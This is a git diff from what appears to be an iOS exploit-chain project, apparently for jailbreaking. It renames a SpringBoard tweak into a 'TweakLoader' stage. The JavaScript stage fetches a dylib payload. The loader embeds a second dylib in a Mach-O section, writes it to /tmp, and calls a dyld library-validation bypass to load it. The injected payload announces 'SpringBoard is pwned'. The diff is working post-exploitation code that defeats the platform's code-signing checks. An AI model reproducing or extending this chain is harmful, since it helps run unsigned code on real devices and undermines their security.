diff --git a/Stage3_VariantB.js b/Stage3_VariantB.js index e529d42..0ce577c 100644 --- a/Stage3_VariantB.js +++ b/Stage3_VariantB.js @@ -1161,7 +1161,7 @@ function YA() {/* Original: YA → resolveSymbols */ // Fetch a single file as ArrayBuffer fetchBin(url) { // Override entry2_type0x0f.dylib - url = url.replace(/\/entry2_type0x0f.dylib$/g, "/../../SpringBoardTweak/.theos/obj/arm64" + (platformModule.platformState.hasPAC?"e":"") + "/SpringBoardTweak.dylib"); + url = url.replace(/\/entry2_type0x0f.dylib$/g, "/../../TweakLoader/.theos/obj/arm64" + (platformModule.platformState.hasPAC?"e":"") + "/TweakLoader.dylib"); window.log("Downloading " + url); return new Promise((resolve, reject) => { diff --git a/SpringBoardTweak/.gitignore b/TweakLoader/.gitignore similarity index 100% rename from SpringBoardTweak/.gitignore rename to TweakLoader/.gitignore diff --git a/TweakLoader/Makefile b/TweakLoader/Makefile new file mode 100644 index 0000000..98687b0 --- /dev/null +++ b/TweakLoader/Makefile @@ -0,0 +1,18 @@ +TARGET := iphone:clang:latest:15.0 +ARCHS = arm64 arm64e +FINALPACKAGE = 1 +STRIP = 0 +GO_EASY_ON_ME = 1 + +include $(THEOS)/makefiles/common.mk + +SUBPROJECTS += SpringBoardTweak +include $(THEOS_MAKE_PATH)/aggregate.mk + +LIBRARY_NAME = TweakLoader +TweakLoader_FILES = TweakLoader.m lv_bypass.c +TweakLoader_CFLAGS = -fno-objc-arc +TweakLoader_LDFLAGS = -sectcreate __TEXT __SBTweak $(THEOS_OBJ_DIR)/SpringBoardTweak.dylib +TweakLoader_INSTALL_PATH = /usr/local/lib + +include $(THEOS_MAKE_PATH)/library.mk diff --git a/SpringBoardTweak/Makefile b/TweakLoader/SpringBoardTweak/Makefile similarity index 72% rename from SpringBoardTweak/Makefile rename to TweakLoader/SpringBoardTweak/Makefile index 63e7c02..9ba5b8d 100644 --- a/SpringBoardTweak/Makefile +++ b/TweakLoader/SpringBoardTweak/Makefile @@ -8,8 +8,8 @@ include $(THEOS)/makefiles/common.mk LIBRARY_NAME = SpringBoardTweak -SpringBoardTweak_FILES = SpringBoardTweak.m lv_bypass.c -SpringBoardTweak_CFLAGS = -fno-objc-arc +SpringBoardTweak_FILES = SpringBoardTweak.m +SpringBoardTweak_CFLAGS = -fobjc-arc SpringBoardTweak_INSTALL_PATH = /usr/local/lib include $(THEOS_MAKE_PATH)/library.mk diff --git a/TweakLoader/SpringBoardTweak/SpringBoardTweak.m b/TweakLoader/SpringBoardTweak/SpringBoardTweak.m new file mode 100644 index 0000000..2509e4b --- /dev/null +++ b/TweakLoader/SpringBoardTweak/SpringBoardTweak.m @@ -0,0 +1,15 @@ +@import UIKit; + +__attribute__((constructor)) static void init() { + dispatch_async(dispatch_get_main_queue(), ^{ + UIAlertController *alert = [UIAlertController alertControllerWithTitle:@"Coruna" message:@"SpringBoard is pwned" preferredStyle:UIAlertControllerStyleAlert]; + [alert addAction:[UIAlertAction actionWithTitle:@"Install TrollHelper (ETA SON)" style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) { + + }]]; + [alert addAction:[UIAlertAction actionWithTitle:@"Respring" style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) { + exit(0); + }]]; + [alert addAction:[UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:nil]]; + [[UIApplication sharedApplication].keyWindow.rootViewController presentViewController:alert animated:YES completion:nil]; + }); +} diff --git a/SpringBoardTweak/SpringBoardTweak.m b/TweakLoader/TweakLoader.m similarity index 51% rename from SpringBoardTweak/SpringBoardTweak.m rename to TweakLoader/TweakLoader.m index f37f834..ab7e8a3 100644 --- a/SpringBoardTweak/SpringBoardTweak.m +++ b/TweakLoader/TweakLoader.m @@ -1,6 +1,5 @@ @import Darwin; @import MachO; -@import UIKit; #include /* _mh_dylib_header */ // Function pointers @@ -8,7 +7,8 @@ extern pthread_t pthread_main_thread_np(void); extern void _pthread_set_self(pthread_t p); void (*_abort)(void); int (*_close)(int); -void * (*_dlsym)(void *, const char *); +void* (*_dlsym)(void *, const char *); +uint8_t* (*_getsectiondata)(const struct mach_header_64 *, const char *, const char *, unsigned long *); thread_t (*_mach_thread_self)(void); int (*_open)(const char *, int, ...); void (*__pthread_set_self)(pthread_t p); @@ -17,45 +17,17 @@ int (*_strncmp)(const char *s1, const char *s2, size_t n); kern_return_t (*_thread_terminate)(mach_port_t); int (*_write)(int, const void *, size_t); -int shellcode_init(void * (*_dlsym)(void* handle, const char* symbol), const char *next_stage_dylib_path); +int dyld_lv_bypass_init(void * (*_dlsym)(void* handle, const char* symbol), const char *next_stage_dylib_path); -static uintptr_t _get_text_vmaddr(const struct mach_header_64 *mh) { - struct load_command *lc = (void*)((uintptr_t)mh + sizeof(struct mach_header_64)); - for (uint32_t i = 0; i < mh->ncmds; i++, lc = (void*)((uint8_t*)lc + lc->cmdsize)) { - if (lc->cmd != LC_SEGMENT_64) continue; - struct segment_command_64 *seg = (void*)lc; - if (_strncmp(seg->segname, "__TEXT", 6) == 0) - return seg->vmaddr; - } - return 0; -} -static size_t macho_size_from_header(const struct mach_header_64 *mh) { - uintptr_t base = (uintptr_t)mh; - uintptr_t text_vm = _get_text_vmaddr(mh); - uintptr_t slide = base - text_vm; // ASLR slide - - struct load_command *lc = (void*)(base + sizeof(struct mach_header_64)); - for (uint32_t i = 0; i < mh->ncmds; i++, lc = (void*)((uint8_t*)lc + lc->cmdsize)) { - if (lc->cmd != LC_SEGMENT_64) continue; - struct segment_command_64 *seg = (void*)lc; - if (_strncmp(seg->segname, "__LINKEDIT", 10) != 0) continue; - - // vmaddr + slide = actual mapped address of __LINKEDIT - // end = that + vmsize - return (seg->vmaddr + slide + seg->vmsize) - base; - } - - return 0; -} - -const char *save_myself(void) { - const char *path = "/tmp/SpringBoardTweak.dylib"; - const struct mach_header_64 *header = (struct mach_header_64 *)&_mh_dylib_header; - size_t size = macho_size_from_header(header); - int fd = _open(path, O_RDWR | O_CREAT | O_TRUNC, 0755); - if (fd < 0) _abort(); +const char *save_actual_dylib(void) { + const char *path = "/tmp/actual.dylib"; + int fd = _open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644); - if (_write(fd, header, size) != size) { + // -sectcreate __TEXT __actual_dylib + + size_t dylib_size = 0; + const char *dylib = (const char *)_getsectiondata((struct mach_header_64 *)&_mh_dylib_header, "__TEXT", "__SBTweak", &dylib_size); + if (_write(fd, dylib, dylib_size) != dylib_size) { _abort(); } _close(fd); @@ -85,6 +57,7 @@ int last(void) { _abort = _dlsym(RTLD_DEFAULT, "abort"); _close = _dlsym(RTLD_DEFAULT, "close"); + _getsectiondata = _dlsym(RTLD_DEFAULT, "getsectiondata"); _mach_thread_self = _dlsym(RTLD_DEFAULT, "mach_thread_self"); _open = _dlsym(RTLD_DEFAULT, "open"); _strncmp = _dlsym(RTLD_DEFAULT, "strncmp"); @@ -92,8 +65,8 @@ int last(void) { _write = _dlsym(RTLD_DEFAULT, "write"); // setup dyld validation bypass - const char *path = save_myself(); - shellcode_init(_dlsym, path); + const char *path = save_actual_dylib(); + dyld_lv_bypass_init(_dlsym, path); // should not return _thread_terminate(_mach_thread_self()); diff --git a/SpringBoardTweak/control b/TweakLoader/control similarity index 72% rename from SpringBoardTweak/control rename to TweakLoader/control index a77d6a9..a008b81 100644 --- a/SpringBoardTweak/control +++ b/TweakLoader/control @@ -1,5 +1,5 @@ -Package: com.yourcompany.springboardtweak -Name: SpringBoardTweak +Package: com.yourcompany.TweakLoader +Name: TweakLoader Version: 0.0.1 Architecture: iphoneos-arm Description: An awesome library of some sort!! diff --git a/SpringBoardTweak/lv_bypass.c b/TweakLoader/lv_bypass.c similarity index 99% rename from SpringBoardTweak/lv_bypass.c rename to TweakLoader/lv_bypass.c index 20ffd3f..2a5673f 100644 --- a/SpringBoardTweak/lv_bypass.c +++ b/TweakLoader/lv_bypass.c @@ -34,7 +34,7 @@ static mach_port_t _mach_task_self_; kern_return_t builtin_vm_protect(mach_port_name_t task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_max, vm_prot_t new_prot); static void init_bypassDyldLibValidation(void); -int shellcode_init(void * (*_dlsym)(void* handle, const char* symbol), +int dyld_lv_bypass_init(void * (*_dlsym)(void* handle, const char* symbol), const char *next_stage_dylib_path) { _printf = _dlsym(RTLD_DEFAULT, "printf");